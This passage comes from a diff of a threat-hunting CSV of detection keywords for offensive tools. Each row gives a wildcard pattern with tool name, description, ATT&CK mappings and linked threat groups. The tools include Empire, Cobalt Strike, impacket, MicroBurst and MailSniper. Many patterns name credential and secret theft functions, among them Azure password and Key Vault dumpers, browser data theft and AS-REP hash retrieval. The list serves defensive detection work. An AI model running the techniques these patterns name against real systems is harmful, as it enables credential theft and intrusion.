T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Start-MonitorTCPConnections.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Get-ADComputer * -Properties PrincipalsAllowedToDelegateToAccount*","offensive_tool_keyword","powershell","Command to get the list of accounts with PrincipalsAllowedToDelegateToAccount (used to exploit Bronze Bit Attack)","T1003 - T1057 - T1087 - T1482 - T1136","TA0001 - TA0002 - TA0005 - TA0006 - TA0008","N/A","N/A","Reconnaissance","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*Get-ADUsernameFromEWS*","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2625","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" -"*GetADUsers.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*Get-ADUsernameFromEWS*","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2626","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" +"*GetADUsers.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" "*getAggressorClient*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*getAllUserSpns*","offensive_tool_keyword","ldapdomaindump","Active Directory information dumper via LDAP","T1087 - T1005 - T1016","TA0007","N/A","N/A","Credential Access","https://github.com/dirkjanm/ldapdomaindump","1","1","N/A","N/A","10","970","176","2023-09-06T05:50:30Z","2016-05-24T18:46:56Z" "*Get-ASREPHash*","offensive_tool_keyword","AD exploitation cheat sheet","AS-REP roasting Get the hash for a roastable user using ASREPRoast.ps1","T1110","TA0006","N/A","N/A","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*Get-AzAutomationAccountCredsREST.ps1*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1709","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z" -"*Get-AzDomainInfo*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1709","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z" -"*Get-AzDomainInfoREST.ps1*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1709","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z" -"*Get-AzKeyVaultKeysREST.ps1*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1709","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z" -"*Get-AzKeyVaultSecretsREST.ps1*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1709","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z" -"*Get-AzPasswords*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1709","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z" -"*Get-AZStorageKeysREST.ps1*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1709","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z" -"*Get-AzureADDomainInfo*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1709","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z" -"*Get-AzureADDomainInfo.ps1*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1709","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z" -"*Get-AzurePasswords*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1709","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z" -"*Get-AzUserAssignedIdentity*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1709","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z" -"*Get-BaseLineResponseTimeEAS*","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2625","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" +"*Get-AzAutomationAccountCredsREST.ps1*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1711","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z" +"*Get-AzDomainInfo*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1711","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z" +"*Get-AzDomainInfoREST.ps1*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1711","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z" +"*Get-AzKeyVaultKeysREST.ps1*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1711","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z" +"*Get-AzKeyVaultSecretsREST.ps1*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1711","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z" +"*Get-AzPasswords*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1711","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z" +"*Get-AZStorageKeysREST.ps1*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1711","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z" +"*Get-AzureADDomainInfo*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1711","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z" +"*Get-AzureADDomainInfo.ps1*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1711","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z" +"*Get-AzurePasswords*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1711","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z" +"*Get-AzUserAssignedIdentity*","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1711","280","2023-09-21T15:53:06Z","2018-07-16T16:47:20Z" +"*Get-BaseLineResponseTimeEAS*","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2626","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" "*Get-BeaconAPI*","offensive_tool_keyword","cobaltstrike","Load any Beacon Object File using Powershell!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/airbus-cert/Invoke-Bof","1","1","N/A","10","10","232","32","2021-12-09T15:10:41Z","2021-12-09T15:09:22Z" "*GetBearerToken.exe https://*.sharepoint.com*","offensive_tool_keyword","SnaffPoint","A tool for pointesters to find candies in SharePoint","T1210.001 - T1087.002 - T1059.006","TA0007 - TA0002 - TA0006","N/A","N/A","Discovery","https://github.com/nheiniger/SnaffPoint","1","0","N/A","7","2","191","19","2022-11-04T13:26:24Z","2022-08-25T13:16:06Z" -"*Get-BloodHoundData*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Get-SPN.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Get-BootKey*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Get-BrowserData.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1153","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Get-BrowserInformation*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-BloodHoundData*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Get-SPN.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-BootKey*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-BrowserData.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1153","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-BrowserInformation*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*GetC2Server*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" -"*Get-CachedGPPPassword*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - 